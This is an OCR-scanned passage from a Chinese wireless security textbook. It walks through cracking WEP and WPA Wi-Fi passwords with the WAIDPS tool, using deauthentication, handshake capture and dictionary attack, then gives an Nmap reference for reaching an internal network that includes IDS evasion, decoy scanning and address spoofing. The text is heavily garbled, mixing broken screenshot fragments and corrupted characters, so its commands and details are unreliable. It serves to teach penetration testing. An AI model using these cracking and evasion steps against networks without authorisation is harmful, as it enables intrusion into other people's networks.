step 园 按 D 键 输出 显示 选项 ， 如 下 图 所 示 。 


[+] Chang' 


This option allow user to switch display on the various viewin e of access point and station informatior 


nts) [Recommended] 
ts) 


此 选项 允许 用 户 在 各 种 访问 点 和 站 点 信息 的 查看 类 型 上 切换 显示 。 

0/H: 隐藏 访问 点 和 站 点 列表 显示 。 

1/A: 仅 显示 接 入 点 列表 ， 隐 藏 关 联 客户 机 。 

2/S: 仅 显示 客户 机 列表 〈 包 含 关联 与 不 关联 的 ) 。 

3/B: 在 不 同 区 域 分 别 显示 接 入 点 与 客户 机 列表 。 

4/P: 带 有 探测 请 求 的 高 级 视图 (将 相关 的 站 点 与 接 入 点 合并 ) ， 该 选项 也 是 默认 


推荐 的 。 
e 5/0: 没有 探测 请 求 的 高 级 视图 (合并 相关 站 点 和 接 入 点 〉。 
e 6/C: 显示 接 入 点 信息 的 时 间 条 形 图 。 
e +/D: 显示 与 多 个 接 入 点 相关 联 的 客户 端 ， 此 步骤 帮助 获知 除 目标 接 入 点 外 ， 是 咎 
还 有 其 他 接 入 点 。 
e 7/N: 显示 关联 /连接 警报 ， 默 认 是 开启 状态 。 
e 8/U: 显示 可 疑 活动 列表 警告 ,默认 是 开启 状态 。 
9/1: 显示 入 侵 检测 /攻击 警报 ， 默 认 是 开启 状态 。 
i 出 程序 ， 如 下 图 所 示 。 
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[?] Enter your option : ( <defautt = return> ) : X 


ES 


9.6 ”实战 演练 


实战 演练 1 一 一 使 用 WAIDPS 系 统 破解 WEP 密 码 

WAIDPS 入 侵 检测 系统 同样 具有 密码 破解 功能 ， 通 过 它 可 以 检查 网 络 设置 是 否 够 安 
全 。 破 解 WEP 密 码 步 又 如 下 : 
step 国 进入 WAIDPS 目 录 ， 使 用 ./waidps.py -i wlan0mon 命 令 启 动 WAIDPS 系 统 ， 按 Enter 
键 ， 切 换 到 命令 模式 ， 如 下 图 所 示 。 


[Enter] 


3:39:61 [9 min ago 


step 国 这 里 可 以 通过 目标 MAC 地 址 或 者 序号 来 选择 AP， 因 为 只 有 一 项 所 以 选择 1 即 可 ， 这 
里 会 给 出 建议 攻击 模式 ， 如 下 图 所 示 。 


第 9 章 “无线 网 络 中 的 虚拟 AP 技术 三 


step 图 选择 第 一 项 使 用 WEP 方 式 攻击 ， 这 里 会 给 出 提示 ， 是 否 使 用 虚假 MAC 地 址 ， 如 下 图 
所 示 。 


ignal to all clients 
found connected to the 


step 较 直接 按 Enter 键 ，WAIDPS 系 统 会 锁定 AP 并 尝试 使 用 虚假 MAC 地 址 进行 连接 ， 如 下 
图 所 示 。 


TP-LINK TECHNOLOGTES co. ,LTD 


[?] Select an option ( 9 - Return ) : 
ected 2 


1C:FA:68:01:2F:08 


step 图 中 断 连 接 后 ， WAIDPS 截 获 客户 端 与 5 AP 的 握手 信息 ， 等 待 获取 足够 多 的 I[Vs， 从 而 
破解 出 密码 ， 并 给 出 相应 的 提示 信息 
实战 演练 2 一 一 使 用 WAIDPS 系 统 破解 WPA 密 码 


使 用 WAIDPS 系 统 破解 WPA 密 码 的 操作 步骤 如 下 : 
step 国 启动 系统 按 Enter 键 切换 到 命令 模式 ， 在 命令 模式 下 选择 A 网 络 ， 如 下 图 所 示 。 


[i] Encryption FiLter 


[S/N. MAC Address Chn Enc Cipher Signal Last seen WPS STN ESSID 


WARNING - NOT FOR ILLEGAL USE 


step 图 这 里 建议 攻击 模式 为 WPA， 如 下 图 所 示 。 
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1C:FA:68:01:2| C 
[ 1C:FA:68:01 - Test-001 ] 
WPA2 / CCMP/TKIP / e 


Previous Detail From Database 


note that after target selection is , all current monitor ocess will be terminated 


ed Attack 


Point 
Captur Handsha 
- WPS Bruteforce PIN 
Live Monitor Access 
Retrur 
[?] Select an option ( 1/2/3/4/9 Default 


step 园 按 Enter 键 开始 通过 字典 进行 密码 破解 ， 如 下 图 所 


Shutting down all interfaces 


Se ed Interfa 
Selected Monitoring Interface 
ted Attacking Interfarc 
g Interfa 


[i] WPA Handshake Capturing 
Application will send broadcast deauthentication signal to all clients connected to the 
gnal between client and access point if any clients were found connected to the access point. 


[?] Previous scan found [ ] client, Rescan for client ? ( Y/n ) : 目 


[step 图 设置 密码 位 置 ， 在 命令 模式 C 选 项 的 第 9 项 进行 设置 。 这 里 也 有 默认 窗 


Dictiona 


[7 choose an option ( D/R/T/H/B/W/C ) 


step 园 选择 第 9 项 ， 可 以 添加 或 修改 字典 文件 ， 如 下 图 所 示 。 


Dictionary Setting 
This option allow user to add List of dictionary for 


[ ] 


- Add dictionary Location 

- Set default dictionary 

- Delete dictionary Location 
Select an option ( A/S/D ) 
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码 文 件 ， 如 下 


第 9 章 “无线 网 络 中 的 虚拟 AP 技术 EEE 


9.7 小 试 身手 
练习 1: 熟悉 虚拟 AP 技术 ， 懂 得 如 何 防御 虚拟 AP。 


练习 2: 使 用 Windows10 系 统 搭建 虚拟 AP。 
练习 3: 搭建 WAIDPS 无 线 网 络 入 侵 检测 系统 。 
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第 10 草 ”从 无 线 网 络 渗透 内 网 


网 络 通信 是 基于 TCP/IP 的 四 层 网 络 模型 ， 因 此 在 每 一 层 都 可 以 通过 特定 的 通信 协议 发 
现存 活 主机 ， 从 而 实现 从 无 线 网 络 渗透 到 内 网 的 操作 。 本 章 介绍 从 无 线 网 络 渗透 到 内 网 的 


方法 ， 主 要 包括 扫描 工具 Nmap 的 应 用 、 二 层 扫描 、 


号 10.1 认识 扫描 工具 Nmap 


Nmap 是 一 个 网 络 连接 端 扫描 软件 ， 
通过 扫描 可 以 确定 哪些 服务 运行 在 哪些 连 
接 端 ， 并 且 推 断 计 算 机 运行 哪个 操作 系 
统 ， 是 网 络 管理 员 常 用 的 扫描 软件 之 一 。 
直接 输入 Nmap 命 令 ， 便 会 打开 Nmap 的 帮 
助 信息 。 


10.1.1 目标 发 现 帮助 信息 


除了 选项 ， 所 有 出 现在 Nmap 命 令 行 上 
的 都 被 视 为 对 目标 主机 的 说 明 ， 最 简单 的 
情况 是 指定 一 个 目标 人 P 地 址 或 主机 名 。 下 图 
为 目标 发 现 的 帮助 信息 。 


ARGET SPECIFICATIONT 
Ci 


te te 
osoft .com/24，192.168.6.1; 16.9.6-255.1-254 


参数 说 明 如 下 : 

e -iL <inputfilename>: 将 不 同 的 IP 
地 址 保存 成 文件 ， 用 这 个 参数 导入 
p 

@ -iR <num hosts>: 随机 选择 目标 ， 
num hosts 表 示 目 标 数 目 ，0 表 示 扫 
描 不 中 断 。 例 如 : Nmap - 退 100 -p 
135 任 意 选取 100 个 IP 地 址 扫描 135 
端口 。 

® --exclude <hostl [, host2] [, host3], 
.>: 排除 主机 /网 络 ， 例 如 : Nmap 
192.168.1.0/24 --exclude 1-100 去 除 掉 
前 100 个 地 址 ， 从 101 开 始 扫描 。 

e@ --excludefile <exclude file>: 将 需要 


三 层 扫 描 、 四 层 扫描 等 。 


排除 的 地 址 存放 到 一 个 文件 当中 ， 
用 该 参数 指定 。 


10.1.2 主机 发 现 帮助 信息 


任何 网 络 探测 任务 的 最 初 几 个 步骤 就 
是 把 一 组 卫 范 围 《 有 时 该 范围 很 大 ) 缩小 为 
一 列 活动 的 或 者 感 兴趣 的 主机 ， 扫 描 每 个 卫 
的 每 个 端口 很 慢 ， 通 常 也 没 必 要 ， 扫 描 什 
么 样 的 主机 主要 依赖 于 扫描 的 目的 。 

发 送 探测 包 到 目标 主机 ， 若 收 到 回 
复 ， 则 说 明 目 标 主机 是 开启 的 ，Nmap 支 持 
约 10 种 不 同 的 主机 探测 方式 ， 默 认 发 送 4 种 
请 求 : 

(1) ICMP echo request。 

(2) a TCP SYN packet to port 443 。 

(3) a TCP ACK packet to port 80。 

(4) an ICMP timestamp request。 

主机 发 现 帮助 信息 ， 如 下 图 所 示 。 


kip host disc 
UnP or SCTP 
k re 


参数 说 明 如 下 : 

e -sL: List Scan 列表 扫描 ， 仅 将 指定 
的 目标 卫 列 举 出 来 ， 并 不 进行 扫描 。 
例如 : Namp -sL 192.168.1.0/28。 

e -sn: Ping Scan 只 利用 Ping 扫 描 进 
行 主机 发 现 ， 不 进行 端口 扫描 。 默 
认 情 况 下 发 送 ICMP 回 声 请 求 和 一 
个 TCP 报 文 到 80 端 口 ， 非 特权 用 户 
发 送 一 个 SYN 报 文 到 80 端 口 。 可 以 


和 除 -PO 之 外 的 任何 发 现 探测 类 
型 -P* 选 项 结合 使 用 以 达到 更 高 的 
灵活 性 。 

-Pn: 将 所 有 指定 的 主机 视 作 开启 
的 ， 跳 过 主机 发 现 的 过 程 。 

-PS [portlist]: TCP SYN Ping， 发 
送 一 个 设置 了 SYN 标 志 位 的 空 TCP 
报 文 。 默 认 端口 为 80〈 可 设置 ) ， 
也 可 指定 端口 。 目 标 主机 端口 关 
闭 ， 回 复 RST， 端 口 开 放 ， 则 回 
复 SYN/ACK， 但 都 表明 目标 主机 
在 线 。UNIX 机 器 上 ， 只 有 特权 用 
户 才能 发 送 和 接收 原始 的 TCP 报 
文 ， 因 此 非特 权 用 户 进行 系统 调用 
connect()， 也 发 送 一 个 SYN 报 文 来 
尝试 建立 连接 。 

-PA [portlist]: TCP ACK Ping, 发 
送 一 个 设置 了 ACK 标 志 位 的 TCP 报 
文 。 默 认 端 口 为 80 〈 可 设置 ) ， 也 
可 指定 端口 。 目 标 主机 在 线 ， 回 复 
RST， 不 在 线 则 超时 。UNIX 机 器 
上 ， 只 有 特权 用 户 才能 发 送 和 接收 
原始 的 TCP 报 文 ， 因 此 非特 权 用 户 
进行 系统 调用 connect()， 也 发 送 一 
个 SYN 报 文 来 尝试 建立 连接 。 

-PU [portlist]: UDP Ping， 发 送 一 
个 空 的 UDP 报 文 到 指定 的 端口 。 默 
认 端 口 为 31338〈 可 设置 ) 。 优 势 是 
可 以 穿越 只 过 滤 TCP 的 防火 墙 或 过 
滤器 。 若 端口 关闭 ， 则 回复 ICMP 端 
口 无 法 到 达 ， 说 明 主 机 在 线 ， 其 他 
类 型 的 ICMP 错 误 如 主机 /网 络 无 法 
到 达 或 者 TTL 超 时 则 表示 主机 不 在 
线 ; 没有 回应 也 被 这 样 解释 ， 但 不 
一 定 正确 (因为 大 多 数 开放 该 端口 
的 服务 会 忽略 该 UDP 报 文 ) 。 

-PY [portlist]: 发 送 一 个 SCTP 数 
据 ， 用 于 传输 语音 的 一 个 协议 。 
-PE/-PP/-PM: ICMP Ping Types， 发 
送 ICMP Type 8〈 响 应 请 求 ) 报 文 ， 
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期 待 从 运行 的 主机 得 到 一 个 Type 0 
〈 响 应 ) 报 文 。 

e -PO: 使 用 IP 协 议 的 Ping 来 进行 
扫描 。 

e -n: 不 用 域名 解析 ， 加 快 扫描 速度 。 

e -R: 为 所 有 目标 IP 地 址 做 反 向 域名 
解析 。 

®@ --dns-servers<serv| (,serv2) , .. >: 使 
用 指定 的 域名 服务 器 进行 解析 ， 一 
般 不 使 用 该 选项 ， 因 为 比较 慢 。 例 
如 : Nmap --system-dns 8.8.8.8 www. 
baidu.com 不 使 用 系统 指定 的 DNS 服 
务 器 。 

e --system-dns: 使 用 操作 系统 默认 的 
DNS 服务 器 ， 加 与 不 加 一 样 。 

e@ --traceroute: 路 由 追踪 ， 同 使 用 系统 
自 带 的 traceroute 效 果 类 似 。 例 如 ， 
Nmap www.baidu.com --traceroute -p 
80。 下 图 为 执行 效果 。 


FOTORaUL: -# nnap wn DardU. Con -traceroute 一 
Starting Nnap 7.70 ( https://nnap.org ) at 32618-19-28 07:07 EDT 
Nmap scan report for www.baidu.com (226.181.111.188) 

Host is up (9.954s latency). 

Dther addresses for www.baldu.conm (not scanned): 220.181.112.24: 


PoRT ”STATE SERVICE 
Be/tcp open http 


TRACEROUTE (using port 443/tcp) 
Hop RTT ADDRESS 


0 
ha 65.58 ms 229.181.111.188 


Nmap done: 1 IP address (1 host up) scanned in 6.52 seconds 


10.1.3 ”端口 扫描 帮助 信息 


Nmap 这 些 年 来 功能 越 来 越 多 ， 它 也 是 
从 一 个 高 效 的 端口 扫描 器 开始 的 ， 并 且 这 
仍然 是 它 的 核心 功能 。Nmap<target> 这 个 简 
单 的 命令 扫描 主机 <target> 上 超过 1660 个 的 
TCP 端 口 。 

许多 传统 的 端口 扫描 器 只 列 出 所 有 端 
口 是 开放 还 是 关闭 的 ，Nmap 的 扫描 信息 量 
更 加 详细 ， 它 把 端口 分 成 六 个 状态 : 

open 〈 开 放 的 ) 、closed〈 关 闭 的 ) 、 
filtered (被 过 滤 的 ) 、unfiltered 〈 未 被 过 滤 
的 ) 、openlfiltered〈 开 放 或 者 被 过 滤 的 ) 
和 closedlfiltered 〈 关 闭 或 者 被 过 滤 的 ) 。 
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1. open 〈 开 放 的 ) 


应 用 程序 正在 该 端口 接收 TCP 连 接 或 者 
UDP 报 文 ， 发 现 这 一 点 常常 是 端口 扫描 的 
主要 目标 。 安 全 意识 强 的 人 都 知道 每 个 开 
放 的 端口 都 有 可 能 是 攻击 的 入 口 。 攻 击 者 
或 者 入 侵 测 试 者 想 要 发 现 开 放 的 端口 。 而 
管理 员 则 试图 关闭 它们 或 者 用 防火 墙 保护 
它们 ， 以 免 妨 碍 合法 用 户 ， 非 安全 扫描 可 
能 对 开放 的 端口 也 感 兴趣 ， 因 为 它们 显示 
了 网 络 上 哪些 服务 可 供 使 用 。 


2. closed (关闭 的 ) 

关闭 的 端口 对 于 Nmap 也 是 可 访问 的 
〈 它 接受 Nmap 的 探测 报 文 并 做 出 响应 ) ， 
但 没有 应 用 程序 在 其 上 监听 ， 它 们 可 以 显 
示 该 IP 地 址 上 主机 发 现 ， 或 者 Ping 扫 描 》 
的 主机 正在 运行 up 也 对 部 分 操作 系统 探测 
有 所 帮助 。 因 为 关闭 的 端口 是 可 访问 的 ， 
也 许 过 会 儿 值得 再 扫描 一 下 ， 可 能 一 些 又 
开放 了 。 系 统管 理 员 可 能 会 考虑 用 防火 墙 
封锁 这 样 的 端口 ， 因 此 就 会 被 显示 为 被 过 
滤 的 状态 。 


3. filtered (被 过 滤 的 ) 


由 于 包 过 滤 阻 止 探 测报 文 到 达 端 口 ， 
Nmap 无 法 确定 该 端口 是 否 开 放 ， 过 滤 可 能 
来 自 专业 的 防火 墙 设备 、 路 由 器 规则 或 者 
主机 上 的 软件 防火 墙 ， 这样 的 端口 一 般 扫 
描 几乎 不 提供 任何 信息 。 有 时 候 它们 响应 
ICMP 错 误 消息 ， 如 类 型 3 代码 13 (无 法 到 
达 目 标 : 通信 被 管理 员 禁 止 ) ， 但 更 普遍 
鸭 是 过 滤器 只 是 丢弃 探测 帧 ， 不 做 任何 响 
应 。 这 迫使 Nmap 重 试 若干 次 以 防 探 测 包 是 
由 于 网 络 阻塞 而 丢弃 的 ， 由 此 使 得 扫描 速 
度 明 显 变 慢 。 


4. unfiltered (未 被 过 滤 的 ) 


未 被 过 滤 状 态 意味 着 端口 可 访问 ， 但 
Nmap 不 能 确定 它 是 开放 还 是 关闭 ， 只 有 用 
于 映射 防火 墙 规则 集 的 ACK 扫 描 才 会 把 端 


164 


口 分 类 到 这 种 状态 。 用 其 他 类 型 的 扫描 如 
窗口 扫描 、SYN 扫 描 或 者 FIN 扫 描 来 扫描 
未 被 过 滤 的 端口 ， 可 以 帮助 确定 端口 是 否 
开放 。 


5. openlfiltered 〈 开 放 或 者 被 过 滤 的 ) 

当 无 法 确定 端口 是 开放 还 是 被 过 滤 
的 ，Nmap 就 把 该 端口 划分 成 这 种 状态 。 开 
放 的 端口 不 响应 就 是 一 个 例子 。 没 有 响应 
也 可 能 意味 着 报 文 过 滤器 丢弃 了 探测 报 文 
或 者 它 引 发 的 任何 响应 ， 因 此 Nmap 无 法 确 
定 该 端口 是 开放 的 还 是 被 过 滤 的 。 


6. closedlfiltered (关闭 或 者 被 过 
滤 的 ) 


该 状态 用 于 Nmap 不 能 确定 端口 是 关闭 
的 还 是 被 过 滤 的 ， 它 只 可 能 出 现在 IPID Idle 
扫描 中 。 

端口 扫描 的 帮助 信息 ， 如 下 图 所 示 。 


BCAN TECHNIQUES: 
-SS/ST/SA/SW/SM: TCP SYN/Connect()/ACK/Window/Maimon scan 
-SU: UDP Scan 
-SN/sF/sX: TCP Null, FIN, and Xmas scans 
--scanflags <flags>: Customize TCP scan flags 
-SI <zombie host[:probeport]>: Idle scan 
-SY/sZ: SCTP INIT/COOKIE-ECHO scans 
-50: IP protocol scan 
-b <FTP relay host>: FTP bounce scan 


参数 说 明 如 下 : 

e -sS: TCP SYN 扫 描 ， 半 开放 扫描 ， 
扫描 速度 快 ， 不易 被 注意 到 不 
完成 TCP 连 接 ) ， 且 能 明确 区 分 
openlclosedlfiltered 。 

e -sT: TCP Connect() 扫 描 ， 建 立 完 整 
连接 ， 容 易 被 记录 ， 对 原始 报 文 控 
制 少 ， 效 率 低 但 是 准确 。 

e@ -SA: TCPACK 扫 描 ， 发 送 一 个 ACK 
数据 包 ， 通 过 SYN/ACK 返 回 数 据 包 
类 型 判断 防火 墙 规则 。 

e -sW: TCP Window 扫 描 ，TCP 窗 口 
扫描 ， 依 赖 于 互联 网 上 少数 系统 
的 实现 细节 ， 因 此 可 信 度 不 高 ， 
根据 窗口 大 小 来 判断 端口 是 开放 
的 ( 正 数 ) 还 是 关闭 的 (0) 。 
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-sM: TCP Maimon 扫 描 ， 探 测报 文 ”扫描 端口 的 顺序 是 随机 的 还 是 依次 扫描 ， 
是 FIN/ACK， 端 口 开 放 或 关闭 ， 都 ”还 可 以 指定 扫描 端口 的 协议 类 型 。 
下 图 为 端口 说 明和 扫描 顺序 帮助 信息 。 


对 这 样 的 报 文 响应 RST 报 文 ， 但 如 
果 端 口 开 放 ， 许 多 基于 BSD 的 系统 
只 是 丢弃 该 探测 报 文 。 

-sSU: 使 用 UDP 扫描 ， 对 UDP 服务 
进行 扫描 ， 如 DNS、SNMP、DHCP 
等 。 可 以 和 TCP 扫 描 结合 使 用 ， 但 
是 效率 低下 ， 开 放 的 和 被 过 滤 的 端 
口 很 少 响应 。 加 速 UDP 扫 描 的 方法 
包括 并 发 扫描 更 多 的 主机 、 先 只 对 
主要 端口 进行 快速 扫描 、 从 防火 墙 
后 面 扫描 、 使 用 -host-timeout 跳 过 慢 
速 的 主机 。 

-SN/-sF/-sX: TCP Null, FIN, and 
Xmas 扫 描 ， 从 RFC 挖 掘 的 微妙 方 
法 来 区 分 开放 关闭 端口 ; 除了 探 
测报 文 的 标志 位 不 同 ， 三 种 扫描 
在 行为 上 一 致 。 
-scanflags<flags>: 通过 指定 任意 
的 TCP 标 志 位 来 设计 扫描 ， 可 以 是 
数字 标记 值 ， 也 可 以 使 用 字符 名 如 
URG、 ACK、 PSH、 RST、 SYN、 
FIN。 

-SI <zombie host[:probeport]>: 中 间 
人 扫描 ， 利 用 中 间 人 主机 上 已 知 IP 
分 段 ID 序列 生成 算法 来 窥探 目标 上 
开放 端口 的 信息 ， 极 端 隐蔽 ， 可 以 
指定 端口 号 ， 否 则 默认 80 端 口 。 
-sY/sZ: 是 针对 SCTP 协 议 的 扫描 ， 
很 少 使 用 。 

-sO: IP 协 议 扫 描 ， 可 以 确定 目标 机 
支持 哪些 IP 协 议 ， 如 TCP、ICMP、 
IGMP。 

-b <FTP relay host>: FTP 弹 跳 扫 
描 ，FTP 中 继 的 一 个 扫描 。 


端口 说 明和 扫描 顺序 


这 类 参数 通常 指定 要 扫描 哪些 端口 ， 


FarspEGIF 


[TON ANUSCAN URUERT 
Only scan specified ports 


参数 说 明 如 下 : 


-Pp <port ranges>: 只 扫描 指定 的 端 
口 ， 单 个 端口 和 用 连 字符 表示 的 端 
口 范围 都 可 以 ， 如 果 不 指 定 扫描 类 
型 ， 默 认 是 TCP 和 UDP 都 扫描 ， 可 
以 通过 在 端口 号 前 加 上 T: 或 者 U: 指 
定 协议 。 例 如 : 参数 -p U:53，111， 
137，T:21-25，80，139，8080 将 扫 
描 UDP 端口 533，111， 和 137， 同 时 
扫描 列 出 的 TCP 端 口 。 
--exclude-ports<port ranges>: 用 于 
过 滤 掉 其 中 的 一 段 。 

-F: 快速 扫描 〈 仅 扫描 100 个 最 常用 
的 端口 ) ，Nmap-services 文 件 指定 
想 要 扫描 的 端口 ， 可 以 用 --datadir 选 
项 指定 自己 的 Nmap-services 文 件 。 
-IT: 默认 情况 下 按 随机 端口 扫 
描 ， 如 果 加 上 该 参数 ， 则 扫描 按 
照 顺序 执行 。 

--top-ports<number>: 指定 靠 前 的 端 
口 数 进行 扫描 。 
--port-ratio<rativ>: 扫描 一 些 更 
常见 的 端口 。 


10.1.5 ”服务 与 版 本 探测 一 一 脚本 扫描 


在 端口 扫描 过 程 中 可 以 判断 该 端口 使 
用 的 是 什么 类 型 的 服务 ， 这 时 使 用 下 面 这 
些 参数 来 设置 探测 服务 规则 ，Nmap 提 供 了 
大 量 的 脚本 ， 通 过 参数 指定 调用 这 些 脚 本 
可 以 更 好 地 完成 扫描 任务 。 


下 图 为 服务 与 版 本 探测 帮助 信息 。 
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vity (for debuqqing) | 


e -sSV: 启用 特征 探测 ， 通 过 从 特征 库 
的 比 对 判断 服务 类 型 。 

e@ --version-intensity <level>: 启用 特 
征 探测 也 并 不 是 将 采集 的 信息 与 特 
征 库 的 所 有 信息 进行 匹配 ， 因 此 使 
用 该 参数 设置 探测 级 别 ， 探 测 级 别 
越 高 匹配 信息 越 多 。 

e --version-light， 设置 扫描 级 别 为 2。 

e --version-all: 设置 扫描 级 别 为 9。 

e --version-trace: 将 扫描 的 结果 进行 
一 次 跟踪 。 

下 图 为 脚本 扫描 的 帮助 信息 。 


CRTPTSCRN 
-SC: equivalent to --script=default 
script=<Lua scripts>: <Lua scripts> is a comma separated list of 
directories, script-files or script-categories 
~-script-args=<nl=v1, [Nn2=v2,...]>; provide arguments to scripts 
-script-args-file=fileneme; provide NSE script args in a fite 
cript-trace: Show all data sent and recelved 
-script-updatedb: Update the script database 
-script-help=<Lua scripts>: Show hetp about scripts. 
<Lua scripts> is a comna-separated list of script-files or 
script -categories. 


参数 说 明 如 下 : 

e -sC: 指定 一 个 具体 脚本 ，--script 参 
数 的 一 个 简写 。 

e --Script<Lua scripts>: 指定 一 个 Lua 
的 脚本 。 

® --script-args=<nl=v1,[n2=v2,.…]>: 指 
定 脚本 的 参数 。 

e --script-args-file=filename: 同上 面 类 
似 ， 指 定 一 个 文件 名 作为 参数 。 

e --script-trace: 脚本 扫描 的 一 个 
跟踪 。 

e --script-updatedb: 更 新 脚本 数 
据 库 。 

e --script-help=<Lua scripts>: 提供 脚 
本 的 帮助 信息 。 


10.1.6 ”系统 判断 一 一 时 间 与 性 能 


通过 Nmap 可 以 对 系统 进行 一 个 判断 ， 
另外 在 扫描 过 程 中 如 果 扫 描 过 快 可 能 会 触 
发 一 些 报 警 ， 合 理 的 配置 扫描 时 间 既 可 以 
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获取 更 多 的 信息 ， 还 可 以 使 Nmap 发 挥 出 更 
好 的 性 能 。 
下 图 为 其 帮助 信息 。 


r>: Send thal > per secom 


操作 系统 相关 的 参数 说 明 如 下 : 

e -O: 启用 操作 系统 检测 ，-A 可 以 同 
时 启用 操作 系统 检测 和 版 本 检测 。 

e --osscan-limit: 针对 指定 的 目标 进行 
操作 系统 检测 。 

e@ --osscan-guess: 当 Nmap 无 法 确定 所 
检测 的 操作 系统 时 ， 会 尽 可 能 地 提 
供 最 相近 的 匹配 。 

时 间 及 性 能 相关 的 参数 说 明 如 下 : 

指定 的 时 间 单 位 可 以 是 : ms(millisec- 

onds),s(seconds), m(minutes) 或 者 h(hours)。 

e -T<0-5>: 设置 时 间 模 板 ， 分 别 与 数 
字 0 一 5 对 应 ， 前 两 种 模式 用 于 IDS 躲 
避 ，Polite 模 式 降低 了 扫描 速度 以 使 
用 更 少 的 带宽 和 目标 主机 资源 。 默 
认 模 式 为 Normal， 因 此 -T3 实 际 上 未 
做 任何 优化 。Aggressive 模 式 假设 用 
户 具有 合适 及 可 靠 的 网 络 从 而 加 速 
扫描 。Insane 模 式 假设 用 户 具 有 特别 
快 的 网 络 或 者 为 获取 更 快速 度 而 牺 
牲 准确 性 。 

e --min-hostgroup/max-hostgroup 
<size>: 调整 并 行 扫描 组 的 大 小 ， 
用 于 保持 组 的 大 小 在 一 个 指定 的 范 
围 之 内 ，Nmap 具 有 并 行 扫描 多 主机 
端口 或 版 本 的 能 力 ，Nmap 将 多 个 
目标 IP 地 址 空间 分 成 组 ， 然 后 在 同 
一 时 间 对 一 个 组 进行 扫描 。 通 常 
大 的 组 更 有 效 。 缺 点 是 只 有 当 整 
个 组 扫描 结束 后 才 会 提供 主机 的 


扫描 结果 。 

e --min-parallelism/max-parallelism 
<numprobes>: 设置 探测 并 行 数 量 。 
® --min-rtt-timeout/max-rtt-timeout/ 
initial-rtt-timeout <time>: 设置 rtt 返 

回 时 间 。 

e@ --max-retries <tries>: 最 大 探测 
数量 。 

e --host-timeout <time>: 目标 主机 超 
时 时 间 ， 超 出 时 间 退 出 扫描 或 跳 过 
该 主机 扫描 。 

® --scan-delay/--max-scan-delay 
<time>: 设置 扫描 的 延 时 时 间 ， 每 
次 探测 的 间隔 时 间 。 例 如 : Nmap 
192.168.1.1 --scan-delay 10s， 每 次 探 
测 间隔 10s 再 进行 。 

e --min-rate <number>: 每 秒 发 包 最 小 
数量 。 

ee --max-rate <number>: 每 秒 发 包 最 大 
数量 。 


10.1.7 ”防火 墙 /IDS 躲 避 和 欺骗 


在 网 络 扫描 中 不 可 避免 地 会 接触 到 
防火 墙 等 网 络 设备 ，Nmap 提 供 了 以 下 组 
避 机 制 ， 使 用 这 些 参数 设置 相应 的 躲避 
规则 。 

下 图 为 防火 墙 /IDS 躲 避 和 欺骗 帮助 


nt packets 
cified ip options 


r nane>: Spoof your MAC address 
TCP/UDP/SCTP checksum 


参数 说 明 如 下 : 

e -f; --mtu <val>: 将 TCP 头 分 段 在 几 
个 包 中 ， 使 得 包 过 滤器 、 IDS 以 及 
其 他 工具 的 检测 更 加 困难 ，--mtu 指 
定 最 小 MTU 单 元 。 

e@ -D <decoyl,decoy2[,ME],…>: 使 用 
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诱饵 隐蔽 扫描 ， 使 用 逗号 分 隔 每 个 
诱饵 主机 ， 也 可 用 自己 的 真实 卫 作 
为 诱饵 ， 这 时 可 使 用 ME 选项 说 明 。 
如 果 在 第 6 个 位 置 或 更 后 的 位 置 使 
用 ME 选项 ， 一 些 常用 端口 扫描 检 
测 器 (如 Solar Designer’s excellent 
scanlogd) 就 不 会 报告 这 个 真实 IP。 
如 果 不 使 用 ME 选项 ，Nmap 将 真实 
了 P 放 在 一 个 随机 的 位 置 。 

e -S <IP Address>: 源 地 址 欺骗 ， 说 
明 所 需 发 送 包 的 接口 了 地 址 ， 弊 端 
是 无 法 收 到 回 包 。 

e -e <iface>: 指定 网 卡 接口 。 

e -8g/--sSource-port <portnum>: 指定 的 
源 端 口 。 

e@ --proxies <urll,[url2],…>: 指定 代理 
服务 器 进行 扫描 。 

e@ --data <hex string>: 在 探测 数据 包 中 
加 入 一 些 数据 ， 让 探测 包 看 上 去 更 
像 正常 数据 包 。 这 里 加 入 的 数据 是 


十 六 进 制 数 。 

e --data-string <string>: 加 入 字符 串 到 
数据 字段 。 

e --data-length <num>: 限定 数据 的 
长 度 。 

e --ip-options <options>: 加 入 IP 包 头 
的 options 字 段 信息 。 


e --tt <val>: 设置 TTL 值 。 

® --spoof-mac <mac address/prefix/ 
vendor name>: MAC 地 址 欺骗 。 

e --badsum: 差错 校 验 ， 使 用 该 参数 
会 发 送 一 些 错误 校 验 的 数据 包 。 


10.1.8 输出 选项 参数 说 明 


扫描 到 的 结果 如 果 数 据 量 比较 大 不 便 
于 阅读 ， 可 以 使 用 输出 项 中 的 一 些 参数 指 
定 输出 成 不 同 格式 的 文件 。Nmap 提 供 了 方 
便 直接 查看 的 交互 式 方式 和 方便 软件 处 理 
的 XML 格式 ， 另 外 还 提供 了 选项 来 控制 输 
出 的 细节 以 及 调试 信息 。 
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五 种 不 同 的 输出 格式 如 下 : 
(1) interactive output。 交 互 式 输出 ， 
默认 的 输出 方式 。 

(2) normal output。 
间 信 息 和 告警 信息 。 

(3) XML output。 可 转换 成 HIML， 方 
便 程 序 处 理 。 

(4) grepable output。 
标 主机 最 多 的 信息 。 

(5) sCRiPt KiDDi3 output 格式 。 
本 的 形式 输出 。 

下 图 为 输出 项 的 帮助 信息 。 


Tents oe error 


显示 较 少 的 运行 时 


在 一 行 中 包含 目 


以 脚 


oT 
oy/ XL-05/-05 eriert Output seon + 
pable format, resbectively, to the glyen fi 
on dasenane Output’ in the three Mojor formets ot ee 
Vi Increase verbosity Level ( effect) 
eer en hb Level se ts ote tor Brasteh ffect) 
Display Stat 


参数 说 明 如 下 ， 

e -oN <file>: 标准 输出 。 

e -oX <file>: XML 输出 写 入 指定 的 
交 伟 5 

e -0S <file>: 类 似 于 交互 工具 输出 。 

e -0G <file>: Grepable 输 出 。 

e -oA <basename>: 输出 至 所 有 

格式 。 

。 -v: 提高 输出 信息 的 详细 度 。 

。 -d: 提高 或 设置 调试 级 别 ，9 级 最 高 。 

e --packet-trace: 跟踪 发 送 和 接收 的 
报 文 。 

e --iflist: 输出 检测 到 的 接口 列表 和 系 
统 路 由 。 

e --append-output: 表示 在 输出 文件 中 
添加 ， 而 不 是 覆盖 原文 件 。 

e --resume <filename>: 继续 中 断 的 
扫描 。 

e@ --stylesheet <path or URL>: 设置 
XSIL 样 式 表 ， 转 换 XMI 输 出 到 
HTML。 在 Web 浏 览 器 中 打开 Nmap 
的 XML 输出 时 ， 将 会 在 文件 系统 中 
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寻找 Nmap.xsl 文 件 ， 并 使 用 它 输出 
结果 。 

e --no-stylesheet: 防止 将 XSL 样 式 表 
与 wWXMLI 输出 关联 起 来 。 


